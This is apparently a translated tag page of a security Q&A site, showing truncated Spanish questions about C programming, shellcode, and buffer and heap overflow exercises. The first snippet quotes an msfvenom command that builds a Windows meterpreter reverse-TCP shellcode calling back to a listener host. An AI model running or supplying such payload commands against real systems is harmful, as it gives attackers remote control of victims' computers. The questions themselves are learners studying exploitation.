Preguntas con etiqueta 'c'

1
respuesta

Fallo de segmentación en shellcode

He generado un código de shell con msfvenom # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=7878 -f c -o shell.c Cuando compilo mi shell.c con gcc (versión 6.3.0-16) con estas opciones: # gcc -o shell shell.c # gcc...
hecha 12.05.2017 - 01:28
1
respuesta

especificador de formato MSFvenom

En msfvenom, ¿qué significa exactamente cuando especifico el formato a C o Python? ¿Y para qué es el formato 'crudo'? Lo sé, cuando el formato es psh-cmd, se ejecuta en el símbolo del sistema, y cuando es exe se ejecuta como un ejecutable normal...
hecha 24.09.2016 - 21:35
1
respuesta

¿Es o fue posible registrar un certificado comodín en el subdominio de tercer nivel?

El uso de un byte nulo en un certificado cn es muy conocido ... y vi este código en un popular servidor smtp (que obviamente pensó que no valía la pena usar gnutls o openssl para hacer ese tipo de cosas) : static bool does_name_match(con...
hecha 03.05.2016 - 16:35
2
respuestas

Enlace estático vs dinámico

Me encontré con el sitio de implementación Curve25519 de DJB ( enlace ) y noté que dice en referencia a su uso:    Puedes y debes incluirlo en tus propios programas, en lugar de ir al esfuerzo de enlazar a una biblioteca compartida; El código...
hecha 23.02.2016 - 22:10
1
respuesta

Expandir el inicio de sesión del usuario en la ruta: filtre los valores maliciosos

Tengo una función que toma un nombre de ruta y sustituye cada aparición de '% u' con una cadena dada. Para mi escenario, esta Cadena dada es el inicio de sesión que un usuario / atacante ingresa a través de ssh durante la autenticación. La ruta...
hecha 16.05.2015 - 14:04
1
respuesta

Iniciar un nuevo shell en un exploit de strcpy usando un desbordamiento de búfer

Estoy aprendiendo sobre desbordamientos de búfer y tengo este código vulnerable del que estoy intentando iniciar un shell desde: #include <string.h> void myfunction(char *arg); int main(int argc, char **argv) { myfunction(argv[1])...
hecha 26.11.2013 - 23:25
0
respuestas

Explotación de una vulnerabilidad de saturación del montón

Realmente estoy tratando de entender el concepto del ataque hecho posible por el código que figura a continuación. Observo que se está utilizando strcpy , que no realiza ninguna verificación de límites y, por lo tanto, habilita los ataq...
hecha 13.12.2018 - 15:53
0
respuestas

Ubicación de shellcode de desbordamiento de búfer

Lo siento si esta publicación está en la sección incorrecta. Soy bastante nuevo en el campo de la seguridad y soy nuevo en stackexchange si esta publicación está en la sección incorrecta. Sería genial si se moviera para mí, también lo siento si...
hecha 05.12.2018 - 00:41
0
respuestas

Fallo de segmentación en el programa de ejercicios

Estoy revisando este video sobre desbordamientos de búfer, pero tengo algunos problemas para replicar la demostración. El problema es que obtengo un error de segmentación cuando espero obtener un shell al final. La idea es que el programa H...
hecha 25.10.2018 - 13:40
0
respuestas

Cómo encontrar la dirección de retorno cuando se realiza un desbordamiento

para una tarea que estoy tratando de encontrar exploits en un programa de c. Encontré uno en Strcpy, que es vulnerable a ataques de desbordamiento. El problema es que en realidad estoy teniendo problemas para implementar el Shellcode a través de...
hecha 03.10.2018 - 05:10